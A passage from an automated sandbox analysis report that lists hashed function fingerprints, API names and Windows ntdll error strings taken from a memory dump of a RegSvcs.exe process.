                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                            • API String ID: 0-929470617
                                                                                            • Opcode ID: b6f7aa6502e8bca95003aa98e4c8b3cd55d734a288fa179736d54e3395719eb1
                                                                                            • Instruction ID: fda919c1f71632a241c7abbabe6b27bd0bb14a0e20bdaf5201153d78318c0652
                                                                                            • Opcode Fuzzy Hash: b6f7aa6502e8bca95003aa98e4c8b3cd55d734a288fa179736d54e3395719eb1
                                                                                            • Instruction Fuzzy Hash: ABE1C671A083018FE724EE24C8947AAB7E1EB84324F184A2FE855CB391E775DD45E743
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F8D770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00FD9346
                                                                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 00FD9341, 00FD9366
                                                                                            • GsHd, xrefs: 00F8D874
                                                                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00FD936B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                            • API String ID: 3446177414-576511823
                                                                                            • Opcode ID: 991b941a11b44fa20c75759f4b5c8bc6364a35a29f1454dbc13937bb68610f24
                                                                                            • Instruction ID: 12d65b4e5e75b8ea73b4b840e7353c070806ff8571f52d4483e5b7c0fd2230fd
                                                                                            • Opcode Fuzzy Hash: 991b941a11b44fa20c75759f4b5c8bc6364a35a29f1454dbc13937bb68610f24
                                                                                            • Instruction Fuzzy Hash: 0FE1B571A083418FDB24DF54C880BAAB7E5BF48328F184A2EE895CB3C1D775D945EB52
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FBB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldvrm
                                                                                            • String ID: +$-$0$0
                                                                                            • API String ID: 1302938615-699404926
                                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                            • Instruction ID: 54d4958207975169799cabb78e135a33163447426b1131e5b8e0dd2fab1e1522
                                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                            • Instruction Fuzzy Hash: E581C470E052499EDF24CF6AC8517FEBBB6AF85320F284259E851A7291CBB49C41EF50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F79126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID: $$@
                                                                                            • API String ID: 3446177414-1194432280
                                                                                            • Opcode ID: 5f7fae23f1fc6478667ad0c9bd46e64965c4e6c4a63b6eab8ea115ab807ca6e0
                                                                                            • Instruction ID: ac91588ce284040676195d3ee387550571408f79f7ed1d3789b9b6b3ae0aa2cc
                                                                                            • Opcode Fuzzy Hash: 5f7fae23f1fc6478667ad0c9bd46e64965c4e6c4a63b6eab8ea115ab807ca6e0
                                                                                            • Instruction Fuzzy Hash: AA812972D002699BDB71DB54CC45BEAB7B4AF08710F0441EAE90DB7280E7749E80DFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F9DB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                            • API String ID: 3446177414-56086060
                                                                                            • Opcode ID: 89ea4bbf711b5aa72e2cbdfb8cd21e79f872339090f7f68a5ad899e0c7b5b472
                                                                                            • Instruction ID: 1e78b861e9d27126aeefeb08253b799d61e37138a3a86570af3c9a179ee6eec7
                                                                                            • Opcode Fuzzy Hash: 89ea4bbf711b5aa72e2cbdfb8cd21e79f872339090f7f68a5ad899e0c7b5b472
                                                                                            • Instruction Fuzzy Hash: 48412631A00640DFDB26DF24C885B6AB7A5EF40774F28857AE54287B91C778DC84E791
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F9DBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                                                            • API String ID: 3446177414-3526935505
                                                                                            • Opcode ID: de6b2f6a2257f59b8244091bb5af72a900486a7ff446923339d381e7ff1c4948
                                                                                            • Instruction ID: 8edc703a5a12f061cfdc29fc9642112f12302c9769a0a7a472015d4be2c5d61e
                                                                                            • Opcode Fuzzy Hash: de6b2f6a2257f59b8244091bb5af72a900486a7ff446923339d381e7ff1c4948
                                                                                            • Instruction Fuzzy Hash: 6931F931504784DFEB22EB28C809F957BE5EF01B60F184066E84687792C7BDACC4E751
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F6C070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID: $
                                                                                            • API String ID: 3446177414-3993045852
                                                                                            • Opcode ID: b529b265f64154acd6a3d30203a36144dafb1c2c76d24423db9ff6f4b3c1f227
                                                                                            • Instruction ID: 50ffa3a6bce6c54521fb228832c08fb2169a73691ad3fdd3d5008fc53ac64519
                                                                                            • Opcode Fuzzy Hash: b529b265f64154acd6a3d30203a36144dafb1c2c76d24423db9ff6f4b3c1f227
                                                                                            • Instruction Fuzzy Hash: A9113C32904219EFCF15AF64E949B9C7B71FF44360F208129F8666B2E0CB365A00EF40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01047CD6 Relevance: 6.4, APIs: 4, Instructions: 397timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: d30ee843148048912130218fd89cfc90e0a66f961d709a066d222ea5cf8ce567
                                                                                            • Instruction ID: 4924bfc6af7c8882b5fd6b3fe7bd796f35dd46c51cc6e732a5d812974f284a04
                                                                                            • Opcode Fuzzy Hash: d30ee843148048912130218fd89cfc90e0a66f961d709a066d222ea5cf8ce567
                                                                                            • Instruction Fuzzy Hash: EDE192B1A10209AFDF15DFA4C881BEEBBF8FF48314F14852AEA55E7280D774A945CB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F9EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8a8316a36ed544ed9696ef69a7e5dc7a1bad6dfc6a41144aed780692864a26f4
                                                                                            • Instruction ID: 3311d238a2d725f57e0191ba957e648a9044483f5b4431818057a5506f748ea1
                                                                                            • Opcode Fuzzy Hash: 8a8316a36ed544ed9696ef69a7e5dc7a1bad6dfc6a41144aed780692864a26f4
                                                                                            • Instruction Fuzzy Hash: 6AE10F71D00608CFDF25CFA9C980A9DBBF5BF48324F24452AE946E7221D775A889EF50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FEEF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: 853e2254ce58c6d1d0bb67ccc5afa655eb9d56206d972f63b54092a22c56736d
                                                                                            • Instruction ID: 4d6b13a74c3120c90ca4484fddb0aebfb57c78bc3ebe37d28c7331440fefd9fe
                                                                                            • Opcode Fuzzy Hash: 853e2254ce58c6d1d0bb67ccc5afa655eb9d56206d972f63b54092a22c56736d
                                                                                            • Instruction Fuzzy Hash: 71715871E01299DFDF04CFA5D884BDDBBB5BF48314F14402AE905EB255D738A909DB60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0104A4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: d810ff1f8e360966e61eca4d819209cf3bf1a8eb7c8825e3bbd837ac1ab57c00
                                                                                            • Instruction ID: 030a5b3e04df86be030adc0a1b03aedd9ff5bf24b0ffd2e9f0d701c56beda9b6
                                                                                            • Opcode Fuzzy Hash: d810ff1f8e360966e61eca4d819209cf3bf1a8eb7c8825e3bbd837ac1ab57c00
                                                                                            • Instruction Fuzzy Hash: 8F5158B1740612DFEB58CE58C6E4A29B7F1BB88210B2441BDDA87CB720DB74EC41CB80
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FEF1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: 01aaf22fece62a486efa16cea6d69d378bc0768a59d5b1f2f0ded221e1568e75
                                                                                            • Instruction ID: 785fa951e0580b3acebc9af5ec5b61bc3c4989906f710dd33d13ac919b35a820
                                                                                            • Opcode Fuzzy Hash: 01aaf22fece62a486efa16cea6d69d378bc0768a59d5b1f2f0ded221e1568e75
                                                                                            • Instruction Fuzzy Hash: 76515472E00259DFDF08CF9AC845ADCBBB1BF88324F14812AE905BB290D7359949DF64
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FA7B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                            • String ID:
                                                                                            • API String ID: 4281723722-0
                                                                                            • Opcode ID: 13e369efecb9671f8eb96b016d16654229b55c32c593b37169167f2e93c6dfe9
                                                                                            • Instruction ID: a08fd21c9917eb8736918976f9f6ef421dca72f869ea9b10fa5e2db6a7f9ed31
                                                                                            • Opcode Fuzzy Hash: 13e369efecb9671f8eb96b016d16654229b55c32c593b37169167f2e93c6dfe9
                                                                                            • Instruction Fuzzy Hash: 84312775E40219DFCF25EFA9D885A9DBBF0BB48720F20412AE411B7294CB3A6D00DF54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F759C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @
                                                                                            • API String ID: 0-2766056989
                                                                                            • Opcode ID: cb0205f39ededb2eb7c928293ccf7dc80f75e6e58b744cfecd26709851151f1a
                                                                                            • Instruction ID: a130a14c5916cc9cb87a9164e117852ee6cef6239c423c34c889c7e37cc7ceb1
                                                                                            • Opcode Fuzzy Hash: cb0205f39ededb2eb7c928293ccf7dc80f75e6e58b744cfecd26709851151f1a
                                                                                            • Instruction Fuzzy Hash: 3E325870D04669DFDB21DF64C884BE9BBB0BB08714F1480EAD44DA7242DBB55E84EF92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldvrm
                                                                                            • String ID: +$-
                                                                                            • API String ID: 1302938615-2137968064
                                                                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                            • Instruction ID: 766c9f00b9988cf66362a79210f487c4e612ee8f32e0f2b732813fea367fbb6e
                                                                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                            • Instruction Fuzzy Hash: FB919171E083069ADB24FE6BC8816FEB7A5AFC4360F24451AE855A7280DB34CD41EF54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01048927 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlDebugPrintTimes.NTDLL ref: 01048B03
                                                                                            • RtlDebugPrintTimes.NTDLL ref: 01048B5B
                                                                                              • Part of subcall function 00FB2B60: LdrInitializeThunk.NTDLL ref: 00FB2B6A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes$InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 1259822791-3916222277
                                                                                            • Opcode ID: 567f7d00355777d5aac982b96a0ae079d0d4342059a79462843597601d2b2f16
                                                                                            • Instruction ID: d336528c8a9da713d8a68623a397f796255619c0dab9a9a2e9b6fc02b80b4486
                                                                                            • Opcode Fuzzy Hash: 567f7d00355777d5aac982b96a0ae079d0d4342059a79462843597601d2b2f16
                                                                                            • Instruction Fuzzy Hash: 1461A271A1021C9BEB668B68CC45BED7BB8AB48700F0485EAF949E6191DB749F80CF50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FA4C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0$Flst
                                                                                            • API String ID: 0-758220159
                                                                                            • Opcode ID: c40a117681dcdbb30e6a7576aa67f0ab652e0215c31da3fd4776a2b05c09223d
                                                                                            • Instruction ID: aa5703c8e404ac1950381cfe9434f2ddf2233ab5e8dd01d493a48442c6cb4c52
                                                                                            • Opcode Fuzzy Hash: c40a117681dcdbb30e6a7576aa67f0ab652e0215c31da3fd4776a2b05c09223d
                                                                                            • Instruction Fuzzy Hash: F3519EB1E002558FCF24CF99C988769FBF4EF95724F14802ED45A9B250EBB0AD45DB80
                                                                                            Uniqueness

